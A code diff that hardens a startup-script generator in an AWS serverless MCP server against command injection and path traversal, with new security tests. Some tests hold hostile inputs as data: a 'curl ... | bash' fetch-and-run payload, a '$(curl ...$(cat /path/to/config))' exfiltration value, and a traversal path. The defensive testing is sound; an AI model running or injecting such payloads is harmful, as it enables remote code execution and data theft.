diff --git a/src/aws-serverless-mcp-server/awslabs/aws_serverless_mcp_server/tools/webapps/utils/startup_script_generator.py b/src/aws-serverless-mcp-server/awslabs/aws_serverless_mcp_server/tools/webapps/utils/startup_script_generator.py index f8520de72a..191eaf873b 100644 --- a/src/aws-serverless-mcp-server/awslabs/aws_serverless_mcp_server/tools/webapps/utils/startup_script_generator.py +++ b/src/aws-serverless-mcp-server/awslabs/aws_serverless_mcp_server/tools/webapps/utils/startup_script_generator.py @@ -19,6 +19,8 @@ """ import os +import re +import shlex import stat from loguru import logger from typing import Dict, Optional @@ -68,10 +70,26 @@ async def generate_startup_script( """ startup_script_name = startup_script_name or get_default_startup_script_name(runtime) script_path = os.path.join(built_artifacts_path, startup_script_name) - entry_point_path = os.path.join(built_artifacts_path, entry_point) logger.info(f'Generating startup script for runtime: {runtime}, entry point: {entry_point}') + # Validate entry_point BEFORE checking file existence + validate_entry_point(entry_point) + + # Validate environment variables if provided + if additional_env: + validate_environment_variables(additional_env) + + # Check for path traversal attacks + entry_point_path = os.path.join(built_artifacts_path, entry_point) + resolved_entry_point = os.path.realpath(entry_point_path) + resolved_artifacts_path = os.path.realpath(built_artifacts_path) + + if not resolved_entry_point.startswith(resolved_artifacts_path + os.sep): + raise ValueError( + 'Path traversal detected: entry_point resolves outside built_artifacts_path' + ) + # Check if entry point exists if not os.path.exists(entry_point_path): error = EntryPointNotFoundError(entry_point, built_artifacts_path) @@ -121,6 +139,43 @@ def get_default_startup_script_name(runtime: str) -> str: return 'bootstrap' +def validate_entry_point(entry_point: str) -> None: + """Validate entry point against allowlist regex to prevent command injection. + + Args: + entry_point: Application entry point to validate + + Raises: + InvalidEntryPointError: If entry point contains invalid characters + """ + # Allowlist: only alphanumeric, dots, underscores, hyphens, and forward slashes + if not re.match(r'^[a-zA-Z0-9._/-]+$', entry_point): + raise ValueError( + 'Entry point contains invalid characters. Only alphanumeric characters, dots, underscores, hyphens, and forward slashes are allowed.' + ) + + +def validate_environment_variables(additional_env: Dict[str, str]) -> None: + """Validate environment variable keys and values. + + Args: + additional_env: Dictionary of environment variables to validate + + Raises: + InvalidEnvironmentVariableError: If any key or value is invalid + """ + for key, value in additional_env.items(): + # Environment variable keys should follow POSIX naming conventions + if not re.match(r'^[a-zA-Z_][a-zA-Z0-9_]*$', key): + raise ValueError( + 'Environment variable key must start with a letter or underscore and contain only alphanumeric characters and underscores' + ) + + # Check for null bytes in values which can cause issues + if '\0' in value: + raise ValueError('Environment variable value contains null bytes') + + def generate_script_content( runtime: str, entry_point: str, additional_env: Optional[Dict[str, str]] = None ) -> str: @@ -132,25 +187,30 @@ def generate_script_content( additional_env: Additional environment variables Returns: - str: Script content + str: Script content with properly escaped values """ - # Generate environment variables setup + # Sanitize entry_point to prevent command injection + safe_entry_point = shlex.quote(entry_point) + + # Generate environment variables setup with proper escaping env_setup = '' if additional_env: env_vars = [] for key, value in additional_env.items(): - env_vars.append(f'export {key}="{value}"') + # Key is already validated, but value needs escaping + safe_value = shlex.quote(value) + env_vars.append(f'export {key}={safe_value}') env_setup = '\n'.join(env_vars) + '\n\n' if runtime.startswith('nodejs'): return f"""#!/bin/bash {env_setup}# Start the application -exec node {entry_point} +exec node {safe_entry_point} """ elif runtime.startswith('python'): return f"""#!/bin/bash {env_setup}# Start the application -exec python {entry_point} +exec python {safe_entry_point} """ elif runtime.startswith('java'): # Determine if it's a JAR file or a class @@ -159,31 +219,31 @@ def generate_script_content( if is_jar: return f"""#!/bin/bash {env_setup}# Start the application -exec java -jar {entry_point} +exec java -jar {safe_entry_point} """ else: return f"""#!/bin/bash {env_setup}# Start the application -exec java {entry_point} +exec java {safe_entry_point} """ elif runtime.startswith('dotnet'): return f"""#!/bin/bash {env_setup}# Start the application -exec dotnet {entry_point} +exec dotnet {safe_entry_point} """ elif runtime.startswith('go'): return f"""#!/bin/bash {env_setup}# Start the application -exec ./{entry_point} +exec ./{safe_entry_point} """ elif runtime.startswith('ruby'): return f"""#!/bin/bash {env_setup}# Start the application -exec ruby {entry_point} +exec ruby {safe_entry_point} """ else: # Generic script for unknown runtimes return f"""#!/bin/bash {env_setup}# Start the application -exec {entry_point} +exec {safe_entry_point} """ diff --git a/src/aws-serverless-mcp-server/tests/test_startup_script_generator.py b/src/aws-serverless-mcp-server/tests/test_startup_script_generator.py index 0e990fd37c..9b3f48e906 100644 --- a/src/aws-serverless-mcp-server/tests/test_startup_script_generator.py +++ b/src/aws-serverless-mcp-server/tests/test_startup_script_generator.py @@ -74,8 +74,8 @@ def test_generate_script_content_nodejs_with_env(self): result = generate_script_content(runtime, entry_point, additional_env) expected = """#!/bin/bash -export NODE_ENV="production" -export PORT="3000" +export NODE_ENV=production +export PORT=3000 # Start the application exec node server.js @@ -104,8 +104,8 @@ def test_generate_script_content_python_with_env(self): result = generate_script_content(runtime, entry_point, additional_env) expected = """#!/bin/bash -export PYTHONPATH="/app" -export DEBUG="true" +export PYTHONPATH=/app +export DEBUG=true # Start the application exec python main.py @@ -274,10 +274,10 @@ async def test_generate_startup_script_with_env_vars(self): assert result == 'bootstrap' - # Verify script content includes environment variables + # Verify script content includes environment variables (shlex.quote format) written_content = ''.join(call.args[0] for call in mock_file().write.call_args_list) - assert 'export NODE_ENV="production"' in written_content - assert 'export PORT="8080"' in written_content + assert 'export NODE_ENV=production' in written_content + assert 'export PORT=8080' in written_content @pytest.mark.asyncio async def test_generate_startup_script_entry_point_not_found(self): @@ -369,11 +369,11 @@ def test_generate_script_content_environment_variable_escaping(self): result = generate_script_content(runtime, entry_point, additional_env) - # All values should be wrapped in double quotes - assert 'export SIMPLE_VAR="value"' in result - assert 'export VAR_WITH_QUOTES="value with "quotes""' in result - assert 'export VAR_WITH_SPACES="value with spaces"' in result - assert 'export VAR_WITH_SPECIAL="value$with&special*chars"' in result + # shlex.quote() wraps simple values without quotes, and complex values in single quotes + assert 'export SIMPLE_VAR=value' in result + assert 'export VAR_WITH_QUOTES=\'value with "quotes"\'' in result + assert "export VAR_WITH_SPACES='value with spaces'" in result + assert "export VAR_WITH_SPECIAL='value$with&special*chars'" in result @pytest.mark.asyncio async def test_generate_startup_script_file_write_error(self): @@ -408,3 +408,156 @@ async def test_generate_startup_script_chmod_error(self): ): with pytest.raises(OSError, match='Permission denied'): await generate_startup_script(runtime, entry_point, built_artifacts_path) + + """Security tests for command injection vulnerabilities.""" + + @pytest.mark.asyncio + async def test_entry_point_command_injection_blocked(self): + """Test that entry_point with command injection attempts is rejected.""" + runtime = 'nodejs18.x' + entry_point = 'app.js; curl http://example.com/script.sh | bash' + built_artifacts_path = '/dir/artifacts' + + with patch('os.path.exists', return_value=True): + with pytest.raises(ValueError, match='Entry point contains invalid characters'): + await generate_startup_script(runtime, entry_point, built_artifacts_path) + + @pytest.mark.asyncio + async def test_entry_point_path_traversal_blocked(self): + """Test that path traversal in entry_point is rejected.""" + runtime = 'nodejs18.x' + entry_point = '../../../system/config' + built_artifacts_path = '/dir/artifacts' + + with patch('os.path.exists', return_value=True): + with pytest.raises( + ValueError, + match='(Entry point contains invalid characters|Path traversal detected)', + ): + await generate_startup_script(runtime, entry_point, built_artifacts_path) + + @pytest.mark.asyncio + async def test_env_variable_command_substitution_escaped(self): + """Test that command substitution in environment variables is properly escaped.""" + runtime = 'nodejs18.x' + entry_point = 'app.js' + built_artifacts_path = '/dir/artifacts' + additional_env = {'DB_URL': '$(curl example.com/data?query=$(cat /path/to/config))'} + + mock_file = mock_open() + mock_stat_result = MagicMock() + mock_stat_result.st_mode = 0o644 + + with ( + patch('os.path.exists', return_value=True), + patch('os.path.realpath', side_effect=lambda x: x), + patch('builtins.open', mock_file), + patch('os.stat', return_value=mock_stat_result), + patch('os.chmod'), + ): + await generate_startup_script( + runtime, entry_point, built_artifacts_path, additional_env=additional_env + ) + + written_content = ''.join(call.args[0] for call in mock_file().write.call_args_list) + # Single quotes prevent command substitution in bash + assert "'$(curl example.com/data?query=$(cat /path/to/config))'" in written_content + # Ensure it's not in double quotes (which would allow execution) + assert '"$(curl example.com/data?query=$(cat /path/to/config))"' not in written_content + + @pytest.mark.asyncio + async def test_env_variable_invalid_key_rejected(self): + """Test that environment variable keys with invalid characters are rejected.""" + runtime = 'nodejs18.x' + entry_point = 'app.js' + built_artifacts_path = '/dir/artifacts' + additional_env = { + 'INVALID-KEY': 'value' # Hyphens not allowed in POSIX env var names + } + + with ( + patch('os.path.exists', return_value=True), + patch('os.path.realpath', side_effect=lambda x: x), + ): + with pytest.raises( + ValueError, match='Environment variable key must start with a letter' + ): + await generate_startup_script( + runtime, entry_point, built_artifacts_path, additional_env=additional_env + ) + + @pytest.mark.asyncio + async def test_env_variable_null_byte_rejected(self): + """Test that environment variable values with null bytes are rejected.""" + runtime = 'nodejs18.x' + entry_point = 'app.js' + built_artifacts_path = '/dir/artifacts' + additional_env = {'DB_URL': 'value\x00malicious'} + + with ( + patch('os.path.exists', return_value=True), + patch('os.path.realpath', side_effect=lambda x: x), + ): + with pytest.raises(ValueError, match='Environment variable value contains null bytes'): + await generate_startup_script( + runtime, entry_point, built_artifacts_path, additional_env=additional_env + ) + + @pytest.mark.asyncio + async def test_valid_entry_point_accepted(self): + """Test that valid entry_point values are accepted.""" + runtime = 'nodejs18.x' + entry_points = [ + 'app.js', + 'src/app.js', + 'dist/server.js', + 'app-server.js', + 'app_server.js', + './app.js', + ] + built_artifacts_path = '/dir/artifacts' + + mock_file = mock_open() + mock_stat_result = MagicMock() + mock_stat_result.st_mode = 0o644 + + for entry_point in entry_points: + with ( + patch('os.path.exists', return_value=True), + patch('builtins.open', mock_file), + patch('os.stat', return_value=mock_stat_result), + patch('os.chmod'), + patch('os.path.realpath', side_effect=lambda x: x), + ): + result = await generate_startup_script(runtime, entry_point, built_artifacts_path) + assert result == 'bootstrap' + + @pytest.mark.asyncio + async def test_valid_env_variables_accepted(self): + """Test that valid environment variables are accepted.""" + runtime = 'nodejs18.x' + entry_point = 'app.js' + built_artifacts_path = '/dir/artifacts' + additional_env = { + 'NODE_ENV': 'production', + 'PORT': '3000', + 'DB_HOST': 'localhost', + '_PRIVATE_VAR': 'value', + 'VAR123': 'value', + } + + mock_file = mock_open() + mock_stat_result = MagicMock() + mock_stat_result.st_mode = 0o644 + + with ( + patch('os.path.exists', return_value=True), + patch('os.path.realpath', side_effect=lambda x: x), + patch('builtins.open', mock_file), + patch('os.stat', return_value=mock_stat_result), + patch('os.chmod'), + ): + result = await generate_startup_script( + runtime, entry_point, built_artifacts_path, additional_env=additional_env + ) + assert result == 'bootstrap'